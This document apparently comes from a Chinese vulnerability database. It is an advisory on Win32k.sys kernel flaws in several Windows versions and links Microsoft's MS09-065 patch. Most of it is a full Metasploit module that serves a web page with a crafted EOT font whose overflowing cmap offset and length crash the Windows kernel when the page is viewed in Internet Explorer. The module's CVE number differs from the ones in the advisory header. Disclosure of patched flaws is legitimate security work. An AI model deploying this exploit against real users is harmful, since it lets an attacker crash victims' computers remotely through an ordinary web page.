BUGTRAQ ID: 36939,36941
CVE ID: CVE-2009-1127,CVE-2009-2513
Microsoft Windows是微软发布的非常流行的操作系统。
Windows系统中的Win32k内核态驱动(Win32k.sys)没有正确地验证传送给Windows内核系统调用的参数,以及用户态通过GDI内核组件所传送的输入。拥有有效的登录凭据且能够本地登录的攻击者可以利用这些漏洞执行任意内核态代码。
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2008
Microsoft Windows Server 2003 SP2
Microsoft Windows 2000SP4
厂商补丁:
Microsoft已经为此发布了一个安全公告(MS09-065)以及相应补丁:
MS09-065:Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)
链接:http://www.microsoft.com/technet/security/bulletin/ms09-065.mspx?pf=true
##
# $Id: ms09_065_eot_integer.rb 7470 2009-11-11 23:48:53Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows EOT Font Table Directory Integer Overflow',
'Description' => %q{
This module exploits an integer overflow flaw in the Microsoft Windows Embedded
OpenType font parsing code located in win32k.sys. Since the kernel itself parses
embedded web fonts, it is possible to trigger a BSoD from a normal web page when
viewed with Internet Explorer.
},
'License' => MSF_LICENSE,
'Author' => 'hdm',
'Version' => '$Revision: 7470 $',
'References' =>
[
[ 'CVE', '2009-2514' ],
[ 'MSB', 'MS09-065' ],
[ 'OSVDB', '59869']
],
'DisclosureDate' => 'Nov 10 2009'
))
register_options([
OptPath.new('EOTFILE', [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.install_root, "data", "exploits", "pricedown.eot")]),
], self.class)
end
def run
exploit
end
def on_request_uri(cli, request)
@tag ||= Rex::Text.rand_text_alpha(8)
@eot ||= ::File.read(datastore['EOTFILE'], ::File.size(datastore['EOTFILE']))
if(request.uri =~ /#{@tag}$/)
content = @eot.dup
# Only this table entry seems to trigger the bug
cidx = content.index('cmap')
# Use an offset and a length that overflow when combined
coff = 0xb0000000
clen = (0xfffffffe - coff + 0xcc)
# Patch in the modified offset and length values
content[cidx + 8, 8] = [ coff, clen ].pack("N*")
# Send the font on its merry way
print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content, { 'Content-Type' => 'application/octet-stream' })
else
var_title = Rex::Text.rand_text_alpha(6 + rand(32))
var_body = Rex::Text.rand_text_alpha(64 + rand(32))
var_font = Rex::Text.rand_text_alpha(2 + rand(6))
var_face = Rex::Text.rand_text_alpha(2 + rand(32))
content = %Q|<html><head><title>#{var_title}</title><style type="text/css">
@font-face{ font-family: '#{var_face}'; src: url('#{get_resource}/#{var_font}#{@tag}'); }
body {
font-family: '#{var_face}';
}
</style></head><body> #{var_body} </body></html>|
print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content, { 'Content-Type' => 'text/html' })
end
end
end